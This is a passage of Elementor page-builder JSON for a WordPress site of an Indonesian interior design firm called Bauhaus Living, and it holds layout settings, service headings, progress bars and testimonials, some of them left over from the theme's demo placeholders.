ackground_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\